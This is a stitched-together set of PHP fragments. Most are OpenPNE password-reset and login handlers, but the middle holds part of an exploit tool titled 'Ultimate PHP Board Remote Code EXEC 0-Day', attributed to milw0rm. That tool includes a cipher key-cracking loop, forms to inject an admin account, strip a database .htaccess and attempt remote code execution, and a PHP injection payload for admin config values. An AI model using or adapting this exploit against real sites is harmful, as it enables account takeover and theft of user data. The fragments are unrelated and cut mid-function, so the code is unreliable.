function execute($requests) { //外部認証の場合はリダイレクト check_action4pne_slave(true); // --- リクエスト変数 $session = $requests['session']; $id = $requests['id']; // ---------- // ハッシュ化されたIDを戻す $c_member_id = t_decrypt($id); // 権限チェック if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid')) { handle_kengen_error(); } if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid_time')) { handle_kengen_error(); } $c_member_config = db_member_c_member_config4c_member_id($c_member_id); // 権限チェック if ($c_member_config['password_reset_sid'] != $session) { handle_kengen_error(); } // 有効期限は24時間 $one_day_time = 86400; $limit_password_reset_sid_time = $c_member_config['password_reset_sid_time'] + $one_day_time; // 権限チェック if (time() > $limit_password_reset_sid_time) { $p = array('msg' => 55); openpne_redirect('ktai', 'page_o_login', $p); } $this->set('session', $session); $this->set('id', $id); return 'success'; }
function execute($requests) { //外部認証の場合はリダイレクト check_action4pne_slave(false); // --- リクエスト変数 $session = $requests['session']; $id = $requests['id']; $new_password = $requests['new_password']; $new_password2 = $requests['new_password2']; // ---------- // ハッシュ化されたIDを戻す $c_member_id = t_decrypt($id); // 権限チェック if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid')) { handle_kengen_error(); } if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid_time')) { handle_kengen_error(); } $c_member_config = db_member_c_member_config4c_member_id($c_member_id); // 権限チェック if ($c_member_config['password_reset_sid'] != $session) { handle_kengen_error(); } // 有効期限は24時間 $one_day_time = 86400; $limit_password_reset_sid_time = $c_member_config['password_reset_sid_time'] + $one_day_time; // 権限チェック if (time() > $limit_password_reset_sid_time) { $p = array('msg_code' => 'password_reset_timeout'); openpne_redirect('pc', 'page_o_tologin', $p); } $msg_list = array(); if (!$new_password) { $msg_list[] = "パスワードを入力してください"; } if (!$new_password2) { $msg_list[] = "パスワード(確認)を入力してください"; } if ($new_password !== $new_password2) { $msg_list[] = "パスワードが一致しません"; } if (!ctype_alnum($new_password) || strlen($new_password) < 6 || strlen($new_password) > 12) { $msg_list[] = "パスワードは6~12文字の半角英数で入力してください"; } // error if ($msg_list) { $p = array('msg' => array_shift($msg_list), 'session' => $session, 'id' => $id); openpne_redirect('pc', 'page_o_password_reset', $p); exit; } db_member_update_password($c_member_id, $new_password); db_member_delete_c_member_config($c_member_id, 'password_reset_sid_time'); db_member_delete_c_member_config($c_member_id, 'password_reset_sid'); $p = array('msg_code' => 'change_password'); openpne_redirect('pc', 'page_o_tologin', $p); }
function execute($requests) { if (LOGIN_URL_KTAI && !DISPLAY_LOGIN) { client_redirect_absolute(LOGIN_URL_KTAI); } // --- リクエスト変数 $msg_id = $requests['msg']; $kad = $requests['kad']; // ---------- //メッセージ $this->set('msg', k_p_common_msg4msg_id($msg_id)); $this->set('ktai_address', t_decrypt($kad)); $this->set('SNS_NAME', SNS_NAME); $this->set('IS_CLOSED_SNS', IS_CLOSED_SNS); // inc_entry_point $this->set('inc_ktai_entry_point', fetch_inc_entry_point($this->getView(), 'ktai_o_login')); return 'success'; }
function execute($requests) { //外部認証の場合はリダイレクト check_action4pne_slave(true); // --- リクエスト変数 $session = $requests['session']; $id = $requests['id']; $new_password = $requests['new_password']; // ---------- // ハッシュ化されたIDを戻す $c_member_id = t_decrypt($id); // 権限チェック if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid')) { handle_kengen_error(); } if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid_time')) { handle_kengen_error(); } $c_member_config = db_member_c_member_config4c_member_id($c_member_id); // 権限チェック if ($c_member_config['password_reset_sid'] != $session) { handle_kengen_error(); } // 有効期限は24時間 $one_day_time = 86400; $limit_password_reset_sid_time = $c_member_config['password_reset_sid_time'] + $one_day_time; // 権限チェック if (time() > $limit_password_reset_sid_time) { $p = array('msg' => 55); openpne_redirect('ktai', 'page_o_login', $p); } // 新しいパスワードは有効な文字列か if (!ctype_alnum($new_password) || strlen($new_password) < 6 || strlen($new_password) > 12) { $p = array('msg' => 20, 'session' => $session, 'id' => $id); openpne_redirect('ktai', 'page_o_password_reset', $p); } db_member_update_password($c_member_id, $new_password); db_member_delete_c_member_config($c_member_id, 'password_reset_sid_time'); db_member_delete_c_member_config($c_member_id, 'password_reset_sid'); $p = array('msg' => 21); openpne_redirect('ktai', 'page_o_login', $p); }
if (isset($_REQUEST['cypher']) && isset($_REQUEST['plain'])) { $cypher_len = strlen($_REQUEST['cypher']); $offset = gen_offset($_REQUEST['cypher'], $_REQUEST['plain']); print "Offset:"; for ($x = 0; $x < $cypher_len; $x++) { print $offset[$x] . ':'; } print '<br>'; $validKeys = 0; $y = 0; for ($y = 255; $y >= 0; $y--) { $newKey[$y] = gen_collision($offset, $y); $key_len = strlen($newKey[$y]); print "<br>Key:{$y} = "; for ($x = 0; $x <= $key_len; $x++) { print $newKey[$y][$x]; } print "<br>Cypher:" . t_encrypt($_REQUEST['plain'], $newKey[$y]); print "<br>Plain :" . t_decrypt($_REQUEST['cypher'], $newKey[$y]) . "<br><br>"; } exit; } } } } } print "<title> Ultimate PHP Board Remote Code EXEC 0-Day </title>\n \n <CENTER><B><I>0-day</I></B></CENTER>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Get Admin</I></B><br>\n <B>Inject an administrative account into UPB:</B>\n <p>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Path to attack:<i>(example: http://www.domain.ext/PathToUPB)</i><br>\n <input name=\"addVict\" type=\"text\" size=60> <br>\n Inject Name:<br>\n <input name=\"addName\" type=\"text\" size=60> <br>\n Inject Password:<br>\n <input name=\"addPass\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Inject Admin\"> \n </form>\n \n <p>\n <B>PHP code injection is possilbe in the admin panel without an exploit. Both admin_config.php and admin_config2.php can be used to execute PHP by tagging on: ' \";phpinfo(); \$crap=\"1 ' to any of the config values </B>( double quotes \" are only used in exploit)</B>\n <p> \n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Gain Read Access To The Database</I></B>\n\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Removes /db/.htaccess to allow access to the remote target's flat file database:<i>(example: http://www.domain.ext/PathToUPB [no trailing slash]) (user database in /db/users.dat) </i><br><br>\n <input name=\"victHTA\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Attack\">\n </form> \n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Crypto</I></B> \n\t\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Plain Text Password:<br>\n <input name=\"encrypt\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Encrypt\"> \n </form>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n Encrypted Password:<br>\n <input name=\"decrypt\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Decrypt\"> \n </form>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br> \n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n Plain Text:<br>\n <input name=\"plain\" type=\"text\" size=60> <br>\n <p> \n corosponding cypher text:<br>\n <input name=\"cypher\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"crack key\"> \n </form>\n ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n <B><I>Proof of Concept Only, Unstable Remote Code Execution Using NON-SQL Database Injection</I></B>\n <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n <p>\n perl CGI Code Injection Attack Remote Target:<br>\n <input name=\"vict\" type=\"text\" size=60> <br>\n <p> \n <input type=\"submit\" value=\"Attack\">\n </form>\n \n <B>http://www.domain.ext/PathToUPB (no trailing slash)</B>\n </body>"; ?> # milw0rm.com [2006-06-20]
/** * メンバーの暗号化された情報を復号化して取得 */ function db_member_c_member_secure4c_member_id($c_member_id) { $sql = 'SELECT pc_address, ktai_address, regist_address, easy_access_id, hashed_password, hashed_password_query_answer FROM c_member_secure WHERE c_member_id = ?'; $c_member_secure = db_get_row($sql, array(intval($c_member_id))); if (is_array($c_member_secure)) { $c_member_secure['pc_address'] = t_decrypt($c_member_secure['pc_address']); $c_member_secure['ktai_address'] = t_decrypt($c_member_secure['ktai_address']); $c_member_secure['regist_address'] = t_decrypt($c_member_secure['regist_address']); } return $c_member_secure; }